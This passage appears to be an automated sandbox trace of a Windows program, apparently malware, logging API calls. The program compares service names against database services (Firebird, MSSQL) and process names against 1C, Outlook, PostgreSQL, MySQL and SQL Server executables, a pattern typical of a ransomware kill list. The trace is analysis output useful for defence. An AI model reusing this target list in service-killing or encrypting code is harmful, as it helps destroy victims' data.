lpString2="gpsvc") returned 1 [0050.212] lstrlenW (lpString="iphlpsvc") returned 8 [0050.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.212] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0050.212] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0050.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0050.212] lstrlenW (lpString="LanmanServer") returned 12 [0050.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0050.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0050.212] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0050.212] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0050.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0050.212] lstrlenW (lpString="LanmanWorkstation") returned 17 [0050.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.212] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0050.212] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0050.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0050.212] lstrlenW (lpString="lmhosts") returned 7 [0050.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0050.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0050.212] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0050.212] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0050.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0050.212] lstrlenW (lpString="MMCSS") returned 5 [0050.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0050.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0050.213] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0050.213] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0050.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0050.213] lstrlenW (lpString="MpsSvc") returned 6 [0050.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0050.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0050.213] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0050.213] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0050.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0050.213] lstrlenW (lpString="Netman") returned 6 [0050.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0050.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0050.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0050.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0050.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0050.213] lstrlenW (lpString="netprofm") returned 8 [0050.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0050.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0050.213] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0050.213] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0050.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0050.213] lstrlenW (lpString="NlaSvc") returned 6 [0050.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0050.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0050.213] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0050.213] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0050.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0050.213] lstrlenW (lpString="nsi") returned 3 [0050.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0050.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0050.213] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0050.213] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0050.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0050.213] lstrlenW (lpString="PcaSvc") returned 6 [0050.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0050.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0050.214] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0050.214] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0050.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0050.214] lstrlenW (lpString="PlugPlay") returned 8 [0050.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0050.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0050.214] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0050.214] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0050.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0050.214] lstrlenW (lpString="Power") returned 5 [0050.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0050.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0050.214] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0050.214] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0050.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0050.214] lstrlenW (lpString="ProfSvc") returned 7 [0050.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0050.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0050.214] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0050.214] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0050.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0050.214] lstrlenW (lpString="RpcEptMapper") returned 12 [0050.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.214] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0050.214] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0050.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0050.214] lstrlenW (lpString="RpcSs") returned 5 [0050.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0050.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0050.214] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0050.214] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0050.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0050.214] lstrlenW (lpString="SamSs") returned 5 [0050.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0050.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0050.215] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0050.215] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0050.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0050.215] lstrlenW (lpString="Schedule") returned 8 [0050.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0050.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0050.215] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0050.215] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0050.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0050.215] lstrlenW (lpString="SENS") returned 4 [0050.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0050.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0050.215] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0050.215] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0050.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0050.215] lstrlenW (lpString="ShellHWDetection") returned 16 [0050.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.215] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0050.215] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0050.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0050.215] lstrlenW (lpString="Spooler") returned 7 [0050.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0050.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0050.215] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0050.215] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0050.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0050.215] lstrlenW (lpString="swprv") returned 5 [0050.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0050.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0050.215] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0050.215] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0050.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0050.216] lstrlenW (lpString="SysMain") returned 7 [0050.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0050.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0050.216] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0050.216] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0050.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0050.216] lstrlenW (lpString="Themes") returned 6 [0050.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0050.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0050.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0050.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0050.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0050.216] lstrlenW (lpString="TrkWks") returned 6 [0050.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0050.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0050.216] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0050.216] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0050.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0050.216] lstrlenW (lpString="UxSms") returned 5 [0050.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0050.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0050.216] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0050.216] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0050.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0050.216] lstrlenW (lpString="VSS") returned 3 [0050.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0050.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0050.216] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0050.216] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0050.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0050.216] lstrlenW (lpString="WdiServiceHost") returned 14 [0050.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.216] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0050.216] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0050.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0050.217] lstrlenW (lpString="WdiSystemHost") returned 13 [0050.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.217] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0050.217] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0050.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0050.217] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0050.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.217] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0050.217] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0050.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0050.217] lstrlenW (lpString="Winmgmt") returned 7 [0050.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0050.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0050.217] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0050.217] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0050.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0050.217] lstrlenW (lpString="WPDBusEnum") returned 10 [0050.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.217] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0050.217] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0050.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0050.217] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x666b08 | out: hHeap=0x570000) returned 1 [0050.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224 [0050.220] Process32FirstW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.220] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0050.221] lstrlenW (lpString="System") returned 6 [0050.221] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0050.221] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0050.221] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0050.221] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0050.221] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0050.221] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0050.221] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0050.221] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0050.222] lstrlenW (lpString="smss.exe") returned 8 [0050.222] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0050.222] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0050.222] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0050.222] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0050.222] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0050.222] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0050.222] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0050.222] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.223] lstrlenW (lpString="csrss.exe") returned 9 [0050.223] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0050.223] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0050.223] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0050.223] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0050.223] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0050.223] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0050.223] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0050.223] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0050.224] lstrlenW (lpString="wininit.exe") returned 11 [0050.224] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0050.224] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0050.224] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0050.224] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.225] lstrlenW (lpString="csrss.exe") returned 9 [0050.225] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0050.226] lstrlenW (lpString="winlogon.exe") returned 12 [0050.226] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0050.227] lstrlenW (lpString="services.exe") returned 12 [0050.227] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0050.227] lstrlenW (lpString="lsass.exe") returned 9 [0050.227] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0050.228] lstrlenW (lpString="lsm.exe") returned 7 [0050.228] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.229] lstrlenW (lpString="svchost.exe") returned 11 [0050.229] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.229] lstrlenW (lpString="svchost.exe") returned 11 [0050.229] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.230] lstrlenW (lpString="svchost.exe") returned 11 [0050.230] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.231] lstrlenW (lpString="svchost.exe") returned 11 [0050.231] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.232] lstrlenW (lpString="svchost.exe") returned 11 [0050.232] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0050.232] lstrlenW (lpString="audiodg.exe") returned 11 [0050.232] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.233] lstrlenW (lpString="svchost.exe") returned 11 [0050.233] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.234] lstrlenW (lpString="svchost.exe") returned 11 [0050.234] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0050.234] lstrlenW (lpString="dwm.exe") returned 7 [0050.234] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0050.235] lstrlenW (lpString="explorer.exe") returned 12 [0050.235] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0050.236] lstrlenW (lpString="spoolsv.exe") returned 11 [0050.236] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.236] lstrlenW (lpString="taskhost.exe") returned 12 [0050.237] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.237] lstrlenW (lpString="svchost.exe") returned 11 [0050.237] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0050.238] lstrlenW (lpString="taskeng.exe") returned 11 [0050.238] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.239] lstrlenW (lpString="taskhost.exe") returned 12 [0050.239] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 